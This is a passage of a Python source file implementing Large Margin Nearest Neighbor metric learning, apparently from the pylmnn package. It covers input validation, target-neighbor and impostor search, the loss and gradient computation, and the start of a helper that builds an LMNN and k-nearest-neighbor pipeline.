... stratify=y, test_size=0.7, random_state=42)
>>> lmnn = LargeMarginNearestNeighbor(n_neighbors=3, random_state=42)
>>> lmnn.fit(X_train, y_train) # doctest: +ELLIPSIS
LargeMarginNearestNeighbor(...)
>>> # Fit and evaluate a simple nearest neighbor classifier for comparison
>>> knn = KNeighborsClassifier(n_neighbors=3)
>>> knn.fit(X_train, y_train) # doctest: +ELLIPSIS
KNeighborsClassifier(...)
>>> print(knn.score(X_test, y_test))
0.933333333333
>>> # Now fit on the data transformed by the learned transformation
>>> knn.fit(lmnn.transform(X_train), y_train) # doctest: +ELLIPSIS
KNeighborsClassifier(...)
>>> print(knn.score(lmnn.transform(X_test), y_test))
0.971428571429
.. warning::
Exact floating-point reproducibility is generally not guaranteed
(unless special care is taken with library and compiler options). As
a consequence, the transformations computed in 2 identical runs of
LargeMarginNearestNeighbor can differ from each other. This can
happen even before the optimizer is called if initialization with
PCA is used (init='pca').
References
----------
.. [1] Weinberger, Kilian Q., and Lawrence K. Saul.
"Distance Metric Learning for Large Margin Nearest Neighbor
Classification."
Journal of Machine Learning Research, Vol. 10, Feb. 2009,
pp. 207-244.
http://jmlr.csail.mit.edu/papers/volume10/weinberger09a/weinberger09a.pdf
.. [2] Wikipedia entry on Large Margin Nearest Neighbor
https://en.wikipedia.org/wiki/Large_margin_nearest_neighbor
"""
def __init__(self, n_neighbors=3, n_components=None, init='pca',
warm_start=False, max_impostors=500000, neighbors_params=None,
weight_push_loss=0.5, impostor_store='auto', max_iter=50,
tol=1e-5, callback=None, store_opt_result=False, verbose=0,
random_state=None, n_jobs=1):
# Parameters
self.n_neighbors = n_neighbors
self.n_components = n_components
self.init = init
self.warm_start = warm_start
self.max_impostors = max_impostors
self.neighbors_params = neighbors_params
self.weight_push_loss = weight_push_loss
self.impostor_store = impostor_store
self.max_iter = max_iter
self.tol = tol
self.callback = callback
self.store_opt_result = store_opt_result
self.verbose = verbose
self.random_state = random_state
self.n_jobs = n_jobs
def fit(self, X, y):
"""Fit the model according to the given training data.
Parameters
----------
X : array-like, shape (n_samples, n_features)
The training samples.
y : array-like, shape (n_samples,)
The corresponding training labels.
Returns
-------
self : object
returns a trained LargeMarginNearestNeighbor model.
"""
# Validate the inputs
X, y = check_X_y(X, y, ensure_min_samples=2)
check_classification_targets(y)
# Check that the inputs are consistent with the parameters
X_valid, y_valid, classes, init = self._validate_params(X, y)
# Initialize the random generator
self.random_state_ = check_random_state(self.random_state)
# Measure the total training time
t_train = time.time()
# Initialize the linear transformation
transformation = self._initialize(X_valid, init)
# Find the target neighbors
target_neighbors = self._select_target_neighbors_wrapper(
X_valid, y_valid, classes)
# Compute the gradient part contributed by the target neighbors
grad_static = self._compute_grad_static(X_valid, target_neighbors)
# Compute the pull loss coefficient
pull_loss_coef = (1. - self.weight_push_loss) / self.weight_push_loss
grad_static *= pull_loss_coef
# Decide how to store the impostors
if self.impostor_store == 'sparse':
use_sparse = True
elif self.impostor_store == 'list':
use_sparse = False
else:
# auto: Use a heuristic based on the data set size
use_sparse = X_valid.shape[0] > 6500
# Create a dictionary of parameters to be passed to the optimizer
disp = self.verbose - 2 if self.verbose > 1 else -1
optimizer_params = {'method': 'L-BFGS-B',
'fun': self._loss_grad_lbfgs,
'jac': True,
'args': (X_valid, y_valid, classes,
target_neighbors, grad_static,
use_sparse),
'x0': transformation,
'tol': self.tol,
'options': dict(maxiter=self.max_iter, disp=disp),
'callback': self._callback
}
# Call the optimizer
self.n_iter_ = 0
opt_result = minimize(**optimizer_params)
# Reshape the solution found by the optimizer
self.components_ = opt_result.x.reshape(-1, X_valid.shape[1])
# Stop timer
t_train = time.time() - t_train
if self.verbose:
cls_name = self.__class__.__name__
# Warn the user if the algorithm did not converge
if not opt_result.success:
warn('[{}] LMNN did not converge: {}'.format(
cls_name, opt_result.message),
ConvergenceWarning)
print('[{}] Training took {:8.2f}s.'.format(cls_name, t_train))
# Optionally store information returned by the optimizer
if self.store_opt_result:
self.opt_result_ = opt_result
return self
def transform(self, X):
"""Applies the learned transformation to the given data.
Parameters
----------
X : array-like, shape (n_samples, n_features)
Data samples.
Returns
-------
X_embedded: array, shape (n_samples, n_components)
The data samples transformed.
Raises
------
NotFittedError
If :meth:`fit` has not been called before.
"""
check_is_fitted(self, ['components_'])
X = check_array(X)
return np.dot(X, self.components_.T)
def _transform_without_checks(self, X):
"""Same as transform but without validating the inputs.
Parameters
----------
X : array, shape (n_samples, n_features)
Data samples.
Returns
-------
X_embedded: array, shape (n_samples, n_components)
The data samples transformed.
"""
return np.dot(X, self.components_.T)
def _validate_params(self, X, y):
"""Validate parameters as soon as :meth:`fit` is called.
Parameters
----------
X : array-like, shape (n_samples, n_features)
The training samples.
y : array-like, shape (n_samples,)
The corresponding training labels.
Returns
-------
X : array, shape (n_samples, n_features)
The validated training samples.
y_inverse : array, shape (n_samples,)
The validated training labels, encoded to be integers in
the range(0, n_classes).
classes_inverse_non_singleton : array, shape (n_classes_non_singleton,)
The non-singleton classes, encoded as integers in [0, n_classes).
init : string or numpy array of shape (n_features_a, n_features_b)
The validated initialization of the linear transformation.
Raises
-------
TypeError
If a parameter is not an instance of the desired type.
ValueError
If a parameter's value violates its legal value range or if the
combination of two or more given parameters is incompatible.
"""
# Find the appearing classes and the class index for each sample
classes, y_inverse = np.unique(y, return_inverse=True)
classes_inverse = np.arange(len(classes))
# Ignore classes that have less than 2 samples (singleton classes)
class_sizes = np.bincount(y_inverse)
mask_singleton_class = class_sizes == 1
singleton_classes, = np.where(mask_singleton_class)
if len(singleton_classes):
warn('There are {} singleton classes that will be ignored during '
'training. A copy of the inputs `X` and `y` will be made.'
.format(len(singleton_classes)))
mask_singleton_sample = np.asarray([yi in singleton_classes for
yi in y_inverse])
X = X[~mask_singleton_sample].copy()
y_inverse = y_inverse[~mask_singleton_sample].copy()
# Check that there are at least 2 non-singleton classes
n_classes_non_singleton = len(classes) - len(singleton_classes)
if n_classes_non_singleton < 2:
raise ValueError('LargeMarginNearestNeighbor needs at least 2 '
'non-singleton classes, got {}.'
.format(n_classes_non_singleton))
classes_inverse_non_singleton = classes_inverse[~mask_singleton_class]
# Check the preferred embedding dimensionality
if self.n_components is not None:
_check_scalar(self.n_components, 'n_components',
integer_types, 1)
if self.n_components > X.shape[1]:
raise ValueError('The preferred embedding dimensionality '
'`n_components` ({}) cannot be greater '
'than the given data dimensionality ({})!'
.format(self.n_components, X.shape[1]))
# If warm_start is enabled, check that the inputs are consistent
_check_scalar(self.warm_start, 'warm_start', bool)
if self.warm_start and hasattr(self, 'components_'):
if self.components_.shape[1] != X.shape[1]:
raise ValueError('The new inputs dimensionality ({}) does not '
'match the input dimensionality of the '
'previously learned transformation ({}).'
.format(X.shape[1],
self.components_.shape[1]))
_check_scalar(self.n_neighbors, 'n_neighbors', integer_types, 1,
X.shape[0] - 1)
_check_scalar(self.max_iter, 'max_iter', integer_types, 1)
_check_scalar(self.tol, 'tol', float, 0.)
_check_scalar(self.weight_push_loss, 'weight_push_loss', float, 0., 1.)
if self.weight_push_loss == 0:
raise ValueError('`weight_push_loss` cannot be zero.')
_check_scalar(self.max_impostors, 'max_impostors', integer_types, 1)
_check_scalar(self.impostor_store, 'impostor_store', string_types)
_check_scalar(self.n_jobs, 'n_jobs', integer_types)
_check_scalar(self.verbose, 'verbose', integer_types, 0)
if self.impostor_store not in ['auto', 'sparse', 'list']:
raise ValueError("`impostor_store` must be 'auto', 'sparse' or "
"'list'.")
if self.callback is not None:
if not callable(self.callback):
raise ValueError('`callback` is not callable.')
# Check how the linear transformation should be initialized
init = self.init
if isinstance(init, np.ndarray):
init = check_array(init)
# Assert that init.shape[1] = X.shape[1]
if init.shape[1] != X.shape[1]:
raise ValueError('The input dimensionality ({}) of the given '
'linear transformation `init` must match the '
'dimensionality of the given inputs `X` ({}).'
.format(init.shape[1], X.shape[1]))
# Assert that init.shape[0] <= init.shape[1]
if init.shape[0] > init.shape[1]:
raise ValueError('The output dimensionality ({}) of the given '
'linear transformation `init` cannot be '
'greater than its input dimensionality ({}).'
.format(init.shape[0], init.shape[1]))
if self.n_components is not None:
# Assert that self.n_components = init.shape[0]
if self.n_components != init.shape[0]:
raise ValueError('The preferred embedding dimensionality '
'`n_components` ({}) does not match '
'the output dimensionality of the given '
'linear transformation `init` ({})!'
.format(self.n_components,
init.shape[0]))
elif init in ['pca', 'identity']:
pass
else:
raise ValueError("`init` must be 'pca', 'identity', or a numpy "
"array of shape (n_components, n_features).")
# Check the preferred number of neighbors
min_non_singleton_size = class_sizes[~mask_singleton_class].min()
if self.n_neighbors >= min_non_singleton_size:
warn('`n_neighbors` (={}) is not less than the number of '
'samples in the smallest non-singleton class (={}). '
'`n_neighbors_` will be set to {} for estimation.'
.format(self.n_neighbors, min_non_singleton_size,
min_non_singleton_size - 1))
self.n_neighbors_ = min(self.n_neighbors, min_non_singleton_size - 1)
neighbors_params = self.neighbors_params
if neighbors_params is not None:
_check_scalar(neighbors_params, 'neighbors_params', dict)
neighbors_params.setdefault('n_jobs', self.n_jobs)
# Attempt to instantiate a NearestNeighbors instance here to
# raise any errors before actually fitting
NearestNeighbors(n_neighbors=self.n_neighbors_, **neighbors_params)
return X, y_inverse, classes_inverse_non_singleton, init
def _initialize(self, X, init):
"""
Parameters
----------
X : array, shape (n_samples, n_features)
The training samples.
init : string or numpy array of shape (n_features_a, n_features)
The initialization of the linear transformation.
Returns
-------
transformation : array, shape (n_components, n_features)
The initialized linear transformation.
"""
transformation = init
if self.warm_start and hasattr(self, 'components_'):
transformation = self.components_
elif isinstance(init, np.ndarray):
pass
elif init == 'pca':
pca = PCA(n_components=self.n_components,
random_state=self.random_state_)
t_pca = time.time()
if self.verbose:
print('[{}] Finding principal components...'.format(
self.__class__.__name__))
sys.stdout.flush()
pca.fit(X)
if self.verbose:
t_pca = time.time() - t_pca
print('[{}] Found principal components in {:5.2f}s.'.format(
self.__class__.__name__, t_pca))
transformation = pca.components_
elif init == 'identity':
if self.n_components is None:
transformation = np.eye(X.shape[1])
else:
transformation = np.eye(self.n_components, X.shape[1])
return transformation
def _select_target_neighbors_wrapper(self, X, y, classes=None):
"""Find the target neighbors of each data sample.
Parameters
----------
X : array, shape (n_samples, n_features)
The training samples.
y : array, shape (n_samples,)
The corresponding training labels indices.
classes : array, shape (n_classes,), optional (default=None)
The non-singleton classes, encoded as integers in [0, n_classes).
If None (default), they will be inferred from ``y``.
Returns
-------
target_neighbors: array, shape (n_samples, n_neighbors)
An array of neighbors indices for each sample.
"""
t_start = time.time()
if self.verbose:
print('[{}] Finding the target neighbors...'.format(
self.__class__.__name__))
sys.stdout.flush()
neighbors_params = self.neighbors_params
if neighbors_params is None:
neighbors_params = {}
neighbors_params.setdefault('n_jobs', self.n_jobs)
target_neighbors = _select_target_neighbors(
X, y, self.n_neighbors_, classes=classes, **neighbors_params)
if self.verbose:
print('[{}] Found the target neighbors in {:5.2f}s.'.format(
self.__class__.__name__, time.time() - t_start))
return target_neighbors
def _compute_grad_static(self, X, target_neighbors):
"""Compute the gradient contributed by the target neighbors.
Parameters
----------
X : array, shape (n_samples, n_features)
The training samples.
target_neighbors : array, shape (n_samples, n_neighbors)
The k nearest neighbors of each sample from the same class.
Returns
-------
grad_target_neighbors, shape (n_features, n_features)
An array with the sum of all outer products of
(sample, target_neighbor) pairs.
"""
t_grad_static = time.time()
if self.verbose:
print('[{}] Computing static part of the gradient...'.format(
self.__class__.__name__))
n_samples, n_neighbors = target_neighbors.shape
row = np.repeat(range(n_samples), n_neighbors)
col = target_neighbors.ravel()
tn_graph = csr_matrix((np.ones(target_neighbors.size), (row, col)),
shape=(n_samples, n_samples))
grad_target_neighbors = _sum_weighted_outer_differences(X, tn_graph)
if self.verbose:
t_grad_static = time.time() - t_grad_static
print('[{}] Computed static part of the gradient in {:5.2f}s.'
.format(self.__class__.__name__, t_grad_static))
return grad_target_neighbors
def _callback(self, transformation):
"""Called after each iteration of the optimizer.
Parameters
----------
        transformation : array, shape (n_components, n_features)
The solution computed by the optimizer in this iteration.
"""
if self.callback is not None:
self.callback(transformation, self.n_iter_)
self.n_iter_ += 1
def _loss_grad_lbfgs(self, transformation, X, y, classes, target_neighbors,
grad_static, use_sparse):
"""Compute the loss and the loss gradient w.r.t. ``transformation``.
Parameters
----------
transformation : array, shape (n_components * n_features,)
The current (flattened) linear transformation.
X : array, shape (n_samples, n_features)
The training samples.
y : array, shape (n_samples,)
The corresponding training labels.
classes : array, shape (n_classes,)
The non-singleton classes, encoded as integers in [0, n_classes).
target_neighbors : array, shape (n_samples, n_neighbors)
The target neighbors of each sample.
grad_static : array, shape (n_features, n_features)
The (weighted) gradient component caused by target neighbors,
that stays fixed throughout the algorithm.
use_sparse : bool
Whether to use a sparse matrix to store the impostors.
Returns
-------
loss: float
The loss based on the given transformation.
grad: array, shape (n_components * n_features,)
The new (flattened) gradient of the loss.
"""
n_samples, n_features = X.shape
transformation = transformation.reshape(-1, n_features)
self.components_ = transformation
if self.n_iter_ == 0:
self.n_iter_ += 1
if self.verbose:
header_fields = ['Iteration', 'Objective Value',
'#Active Triplets', 'Time(s)']
header_fmt = '{:>10} {:>20} {:>20} {:>10}'
header = header_fmt.format(*header_fields)
cls_name = self.__class__.__name__
print('[{}]'.format(cls_name))
print('[{}] {}\n[{}] {}'.format(cls_name, header,
cls_name, '-' * len(header)))
t_funcall = time.time()
X_embedded = self._transform_without_checks(X)
# Compute (squared) distances to the target neighbors
n_neighbors = target_neighbors.shape[1]
dist_tn = np.zeros((n_samples, n_neighbors))
for k in range(n_neighbors):
dist_tn[:, k] = row_norms(X_embedded -
X_embedded[target_neighbors[:, k]],
squared=True)
# Add the margin to all (squared) distances to target neighbors
dist_tn += 1
# Find the impostors and compute (squared) distances to them
impostors_graph = self._find_impostors(
X_embedded, y, classes, dist_tn[:, -1], use_sparse)
# Compute the push loss and its gradient
loss, grad_new, n_active_triplets = \
_compute_push_loss(X, target_neighbors, dist_tn, impostors_graph)
# Compute the total gradient
grad = np.dot(transformation, grad_static + grad_new)
grad *= 2
# Add the (weighted) pull loss to the total loss
metric = np.dot(transformation.T, transformation)
loss += np.dot(grad_static.ravel(), metric.ravel())
if self.verbose:
t_funcall = time.time() - t_funcall
values_fmt = '[{}] {:>10} {:>20.6e} {:>20,} {:>10.2f}'
print(values_fmt.format(self.__class__.__name__, self.n_iter_,
loss, n_active_triplets, t_funcall))
sys.stdout.flush()
return loss, grad.ravel()
def _find_impostors(self, X_embedded, y, classes, margin_radii,
use_sparse=True):
"""Compute the (sample, impostor) pairs exactly.
Parameters
----------
X_embedded : array, shape (n_samples, n_components)
An array of transformed samples.
y : array, shape (n_samples,)
The corresponding (possibly encoded) class labels.
classes : array, shape (n_classes,)
The non-singleton classes, encoded as integers in [0, n_classes).
margin_radii : array, shape (n_samples,)
(Squared) distances of samples to their farthest target
neighbors plus margin.
use_sparse : bool, optional (default=True)
Whether to use a sparse matrix to store the (sample, impostor)
pairs.
Returns
-------
impostors_graph : coo_matrix, shape (n_samples, n_samples)
Element (i, j) is the distance between samples i and j if j is an
impostor to i, otherwise zero.
"""
n_samples = X_embedded.shape[0]
if use_sparse:
# Initialize a sparse (indicator) matrix for impostors storage
impostors_sp = csr_matrix((n_samples, n_samples), dtype=np.int8)
for class_id in classes[:-1]:
ind_in, = np.where(y == class_id)
ind_out, = np.where(y > class_id)
# Split ind_out x ind_in into chunks of a size that fits
# in memory
imp_ind = _find_impostors_blockwise(
X_embedded[ind_out], X_embedded[ind_in],
margin_radii[ind_out], margin_radii[ind_in])
if len(imp_ind):
# sample impostors if they are too many
if len(imp_ind) > self.max_impostors:
imp_ind = self.random_state_.choice(
imp_ind, self.max_impostors, replace=False)
dims = (len(ind_out), len(ind_in))
ii, jj = np.unravel_index(imp_ind, shape=dims)
# Convert indices to refer to the original data matrix
imp_row = ind_out[ii]
imp_col = ind_in[jj]
new_imp = csr_matrix((np.ones(len(imp_row), dtype=np.int8),
(imp_row, imp_col)), dtype=np.int8,
shape=(n_samples, n_samples))
impostors_sp = impostors_sp + new_imp
impostors_sp = impostors_sp.tocoo(copy=False)
imp_row = impostors_sp.row
imp_col = impostors_sp.col
# Make sure we do not exceed max_impostors
n_impostors = len(imp_row)
if n_impostors > self.max_impostors:
ind_sampled = self.random_state_.choice(
n_impostors, self.max_impostors, replace=False)
imp_row = imp_row[ind_sampled]
imp_col = imp_col[ind_sampled]
imp_dist = _paired_distances_blockwise(X_embedded, imp_row,
imp_col)
else:
# Initialize lists for impostors storage
imp_row, imp_col, imp_dist = [], [], []
for class_id in classes[:-1]:
ind_in, = np.where(y == class_id)
ind_out, = np.where(y > class_id)
# Split ind_out x ind_in into chunks of a size that fits in
# memory
imp_ind, dist_batch = _find_impostors_blockwise(
X_embedded[ind_out], X_embedded[ind_in],
margin_radii[ind_out], margin_radii[ind_in],
return_distance=True)
if len(imp_ind):
# sample impostors if they are too many
if len(imp_ind) > self.max_impostors:
ind_sampled = self.random_state_.choice(
len(imp_ind), self.max_impostors, replace=False)
imp_ind = imp_ind[ind_sampled]
dist_batch = dist_batch[ind_sampled]
dims = (len(ind_out), len(ind_in))
ii, jj = np.unravel_index(imp_ind, shape=dims)
# Convert indices to refer to the original data matrix
imp_row.extend(ind_out[ii])
imp_col.extend(ind_in[jj])
imp_dist.extend(dist_batch)
imp_row = np.asarray(imp_row, dtype=np.intp)
imp_col = np.asarray(imp_col, dtype=np.intp)
imp_dist = np.asarray(imp_dist)
# Make sure we do not exceed max_impostors
n_impostors = len(imp_row)
if n_impostors > self.max_impostors:
ind_sampled = self.random_state_.choice(
n_impostors, self.max_impostors, replace=False)
imp_row = imp_row[ind_sampled]
imp_col = imp_col[ind_sampled]
imp_dist = imp_dist[ind_sampled]
impostors_graph = coo_matrix((imp_dist, (imp_row, imp_col)),
shape=(n_samples, n_samples))
return impostors_graph
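    # Sketch of the impostor criterion used above (explanatory comment, not
    # part of the original code): a sample j from a different class is an
    # impostor to sample i if, in the embedded space,
    #     ||L x_j - L x_i||^2 < margin_radii[i]
    # where margin_radii[i] is the squared distance of i to its farthest
    # target neighbor plus the unit margin; the blockwise search applies this
    # test in both directions (radii_a and radii_b), so it only has to compare
    # squared distances against precomputed radii.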
########################
# Some core functions #
#######################
def _select_target_neighbors(X, y, n_neighbors, classes=None, **nn_kwargs):
"""Find the target neighbors of each data sample.
Parameters
----------
X : array, shape (n_samples, n_features)
The training samples.
y : array, shape (n_samples,)
The corresponding (encoded) training labels.
n_neighbors : int
The number of target neighbors to select for each sample in X.
classes : array, shape (n_classes,), optional (default=None)
The non-singleton classes, encoded as integers in [0, n_classes).
If None (default), they will be inferred from ``y``.
**nn_kwargs : keyword arguments
Parameters to be passed to a :class:`neighbors.NearestNeighbors`
instance except from ``n_neighbors``.
Returns
-------
target_neighbors: array, shape (n_samples, n_neighbors)
The indices of the target neighbors of each sample.
"""
target_neighbors = np.zeros((X.shape[0], n_neighbors), dtype=np.intp)
nn = NearestNeighbors(n_neighbors=n_neighbors, **nn_kwargs)
if classes is None:
classes = np.unique(y)
for class_id in classes:
ind_class, = np.where(y == class_id)
nn.fit(X[ind_class])
neigh_ind = nn.kneighbors(return_distance=False)
target_neighbors[ind_class] = ind_class[neigh_ind]
return target_neighbors
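# Illustrative usage of _select_target_neighbors (comment only, hypothetical
# values):
#     X = np.array([[0.], [1.], [10.], [11.]])
#     y = np.array([0, 0, 1, 1])
#     _select_target_neighbors(X, y, n_neighbors=1)  # -> [[1], [0], [3], [2]]
# i.e. each sample is paired with its nearest neighbor from its own class.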
def _find_impostors_blockwise(X_a, X_b, radii_a, radii_b,
return_distance=False, block_size=8):
"""Find (sample, impostor) pairs in blocks to avoid large memory usage.
Parameters
----------
X_a : array, shape (n_samples_a, n_components)
Transformed data samples from class A.
X_b : array, shape (n_samples_b, n_components)
Transformed data samples from class B.
radii_a : array, shape (n_samples_a,)
Squared distances of the samples in ``X_a`` to their margins.
radii_b : array, shape (n_samples_b,)
Squared distances of the samples in ``X_b`` to their margins.
block_size : int, optional (default=8)
The maximum number of mebibytes (MiB) of memory to use at a time for
calculating paired squared distances.
return_distance : bool, optional (default=False)
Whether to return the squared distances to the impostors.
Returns
-------
imp_indices : array, shape (n_impostors,)
Unraveled indices of (sample, impostor) pairs referring to a matrix
of shape (n_samples_a, n_samples_b).
imp_distances : array, shape (n_impostors,), optional
imp_distances[i] is the squared distance between samples imp_row[i] and
imp_col[i], where
imp_row, imp_col = np.unravel_index(imp_indices, shape=(n_samples_a,
n_samples_b))
"""
n_samples_a = X_a.shape[0]
bytes_per_row = X_b.shape[0] * X_b.itemsize
block_n_rows = int(block_size*1024*1024 // bytes_per_row)
imp_indices, imp_distances = [], []
# X_b squared norm stays constant, so pre-compute it to get a speed-up
X_b_norm_squared = row_norms(X_b, squared=True)[np.newaxis, :]
for chunk in gen_batches(n_samples_a, block_n_rows):
# The function `sklearn.metrics.pairwise.euclidean_distances` would
# add an extra ~8% time of computation due to input validation on
# every chunk and another ~8% due to clipping of negative values.
distances_ab = _euclidean_distances_without_checks(
X_a[chunk], X_b, squared=True, Y_norm_squared=X_b_norm_squared,
clip=False)
ind_b, = np.where((distances_ab < radii_a[chunk, None]).ravel())
ind_a, = np.where((distances_ab < radii_b[None, :]).ravel())
ind = np.unique(np.concatenate((ind_a, ind_b)))
if len(ind):
ind_plus_offset = ind + chunk.start * X_b.shape[0]
imp_indices.extend(ind_plus_offset)
if return_distance:
# We only need to do clipping if we return the distances.
distances_chunk = distances_ab.ravel()[ind]
# Clip only the indexed (unique) distances
np.maximum(distances_chunk, 0, out=distances_chunk)
imp_distances.extend(distances_chunk)
imp_indices = np.asarray(imp_indices)
if return_distance:
return imp_indices, np.asarray(imp_distances)
else:
return imp_indices
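# Worked example for the chunking above (illustrative, assumes float64 data):
# with X_b.shape == (20000, 2), one row of the pairwise distance block takes
# 20000 * 8 bytes = 160 kB, so the default block_size of 8 MiB gives
# block_n_rows = int(8 * 1024 * 1024 // 160000) = 52 rows of X_a per chunk.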
def _compute_push_loss(X, target_neighbors, dist_tn, impostors_graph):
"""
Parameters
----------
X : array, shape (n_samples, n_features)
The training input samples.
target_neighbors : array, shape (n_samples, n_neighbors)
Indices of target neighbors of each sample.
dist_tn : array, shape (n_samples, n_neighbors)
(Squared) distances of samples to their target neighbors.
impostors_graph : coo_matrix, shape (n_samples, n_samples)
Element (i, j) is the distance between sample i and j if j is an
impostor to i, otherwise zero.
Returns
-------
loss : float
The push loss caused by the given target neighbors and impostors.
grad : array, shape (n_features, n_features)
The gradient of the push loss.
n_active_triplets : int
The number of active triplet constraints.
"""
n_samples, n_neighbors = dist_tn.shape
imp_row = impostors_graph.row
imp_col = impostors_graph.col
dist_impostors = impostors_graph.data
loss = 0
shape = (n_samples, n_samples)
A0 = csr_matrix(shape)
sample_range = range(n_samples)
n_active_triplets = 0
for k in range(n_neighbors - 1, -1, -1):
loss1 = np.maximum(dist_tn[imp_row, k] - dist_impostors, 0)
ac, = np.where(loss1 > 0)
n_active_triplets += len(ac)
A1 = csr_matrix((2 * loss1[ac], (imp_row[ac], imp_col[ac])), shape)
loss2 = np.maximum(dist_tn[imp_col, k] - dist_impostors, 0)
ac, = np.where(loss2 > 0)
n_active_triplets += len(ac)
A2 = csc_matrix((2 * loss2[ac], (imp_row[ac], imp_col[ac])), shape)
val = (A1.sum(1).ravel() + A2.sum(0)).getA1()
A3 = csr_matrix((val, (sample_range, target_neighbors[:, k])), shape)
A0 = A0 - A1 - A2 + A3
loss += np.dot(loss1, loss1) + np.dot(loss2, loss2)
grad = _sum_weighted_outer_differences(X, A0)
return loss, grad, n_active_triplets
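# Explanatory note (comment only, not part of the original code): because
# dist_tn already includes the unit margin, loss1 above is the hinge value
# max(0, 1 + ||Lx_i - Lx_k||^2 - ||Lx_i - Lx_j||^2) for a triplet of sample i,
# target neighbor k and impostor j; its square enters the loss via
# np.dot(loss1, loss1), while the 2 * loss weights assembled into A0 yield the
# matching gradient through _sum_weighted_outer_differences.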
##########################
# Some helper functions #
#########################
def _paired_distances_blockwise(X, ind_a, ind_b, squared=True, block_size=8):
"""Equivalent to row_norms(X[ind_a] - X[ind_b], squared=squared).
Parameters
----------
X : array, shape (n_samples, n_features)
An array of data samples.
ind_a : array, shape (n_indices,)
An array of sample indices.
ind_b : array, shape (n_indices,)
Another array of sample indices.
squared : bool (default=True)
Whether to return the squared distances.
block_size : int, optional (default=8)
The maximum number of mebibytes (MiB) of memory to use at a time for
calculating paired (squared) distances.
Returns
-------
distances: array, shape (n_indices,)
An array of pairwise, optionally squared, distances.
"""
bytes_per_row = X.shape[1] * X.itemsize
batch_size = int(block_size*1024*1024 // bytes_per_row)
n_pairs = len(ind_a)
distances = np.zeros(n_pairs)
for chunk in gen_batches(n_pairs, batch_size):
distances[chunk] = row_norms(X[ind_a[chunk]] - X[ind_b[chunk]], True)
return distances if squared else np.sqrt(distances, out=distances)
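# Illustrative usage (comment only, hypothetical values):
#     X = np.array([[0., 0.], [3., 4.]])
#     _paired_distances_blockwise(X, np.array([0]), np.array([1]))
# returns array([25.]) (the squared distance), and array([5.]) when called
# with squared=False.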
def _sum_weighted_outer_differences(X, weights):
"""Compute the sum of weighted outer pairwise differences.
Parameters
----------
X : array, shape (n_samples, n_features)
An array of data samples.
weights : csr_matrix, shape (n_samples, n_samples)
A sparse weights matrix.
Returns
-------
sum_weighted_outer_diffs : array, shape (n_features, n_features)
The sum of all outer weighted differences.
"""
weights_sym = weights + weights.T
diagonal = weights_sym.sum(1).getA()
laplacian_dot_X = diagonal * X - safe_sparse_dot(weights_sym, X,
dense_output=True)
result = np.dot(X.T, laplacian_dot_X)
return result
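# Background for the computation above (explanatory comment): it uses the
# graph-Laplacian identity
#     sum_ij W_ij (x_i - x_j)(x_i - x_j)^T = X^T (D - W_sym) X,
# where W_sym = W + W^T and D = diag(row sums of W_sym), which avoids
# materialising the individual outer products.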
def _check_scalar(x, name, target_type, min_val=None, max_val=None):
"""Validate scalar parameters type and value.
Parameters
----------
x : object
The scalar parameter to validate.
name : str
The name of the parameter to be printed in error messages.
target_type : type or tuple
Acceptable data types for the parameter.
min_val : float or int, optional (default=None)
        The minimum valid value the parameter can take. If None (default) it
is implied that the parameter does not have a lower bound.
    max_val : float or int, optional (default=None)
The maximum valid value the parameter can take. If None (default) it
is implied that the parameter does not have an upper bound.
Raises
-------
TypeError
If the parameter's type does not match the desired type.
ValueError
If the parameter's value violates the given bounds.
"""
if not isinstance(x, target_type):
raise TypeError('`{}` must be an instance of {}, not {}.'
.format(name, target_type, type(x)))
if min_val is not None and x < min_val:
raise ValueError('`{}`= {}, must be >= {}.'.format(name, x, min_val))
if max_val is not None and x > max_val:
raise ValueError('`{}`= {}, must be <= {}.'.format(name, x, max_val))
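# Illustrative usage (comment only): _check_scalar(3, 'n_neighbors', int,
# min_val=1) passes silently, _check_scalar(0, 'n_neighbors', int, min_val=1)
# raises ValueError, and _check_scalar(1.5, 'n_neighbors', int) raises
# TypeError.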
#####################################################################
# Convenience function to construct the trivial LMNN - KNN pipeline #
#####################################################################
def make_lmnn_pipeline(
n_neighbors=3, n_components=None, init='pca', warm_start=False,
max_impostors=500000, neighbors_params=None, weight_push_loss=0.5,
impostor_store='auto', max_iter=50, tol=1e-5, callback=None,
store_opt_result=False, verbose=0, random_state=None, n_jobs=1,
n_neighbors_predict=None, weights='uniform', algorithm='auto',
leaf_size=30, n_jobs_predict=None, **kwargs):
"""Constructs a LargeMarginNearestNeighbor - KNeighborsClassifier pipeline.
See LargeMarginNearestNeighbor module documentation for details.
Parameters
----------
n_neighbors_predict : int, optional (default=None)
The number of neighbors to use during prediction. If None (default)
the value of ``n_neighbors`` used to train the model is used.
weights : str or callable, optional (default = 'uniform')
weight function used in prediction. Possible values:
- 'uniform' : uniform weights. All points in each neighborhood
are weighted equally.
- 'distance' : weight points by the inverse of their distance.
in this case, closer neighbors of a query point will have a
greater influence than neighbors which are further away.
- [callable] : a user-defined function which accepts an
array of distances, and returns an array of the same shape
containing the weights.
algorithm : {'auto', 'ball_tree', 'kd_tree', 'brute'}, optional
Algorithm used to compute the nearest neighbors:
- 'ball_tree' will use :class:`BallTree`
- 'kd_tree' will use :class:`KDTree`
- 'brute' will use a brute-force search.
- 'auto' will attempt to decide the most appropriate algorithm
based on the values passed to :meth:`fit` method.
Note: fitting on sparse input will override the setting of
this parameter, using brute force.
leaf_size : int, optional (default = 30)
Leaf size passed to BallTree or KDTree. This can affect the
speed of the construction and query, as well as the memory
required to store the tree. The optimal value depends on the
nature of the problem.
n_jobs_predict : int, optional (default=None)
The number of parallel jobs to run for neighbors search during
prediction. If None (default), then the value of ``n_jobs`` is used.
memory : None, str or object with the joblib.Memory interface, optional
Used to cache the fitted transformers of the pipeline. By default,
no caching is performed. If a string is given, it is the path to
the caching directory. Enabling caching triggers a clone of
the transformers before fitting. Therefore, the transformer
instance given to the pipeline cannot be inspected
directly. Use the attribute ``named_steps`` or ``steps`` to
inspect estimators within the pipeline. Caching the
transformers is advantageous when fitting is time consuming.
Returns
-------
lmnn_pipe : Pipeline
A Pipeline instance with two steps: a ``LargeMarginNearestNeighbor``
instance that is used to fit the model and a ``KNeighborsClassifier``
instance that is used for prediction.
Examples
--------
>>> from pylmnn import make_lmnn_pipeline
>>> from sklearn.datasets import load_iris
>>> from sklearn.model_selection import train_test_split
>>> X, y = load_iris(return_X_y=True)
>>> X_train, X_test, y_train, y_test = train_test_split(X, y,
... stratify=y, test_size=0.7, random_state=42)
>>> lmnn_pipe = make_lmnn_pipeline(n_neighbors=3, n_neighbors_predict=3,
... random_state=42)
>>> lmnn_pipe.fit(X_train, y_train) # doctest: +ELLIPSIS
Pipeline(...)
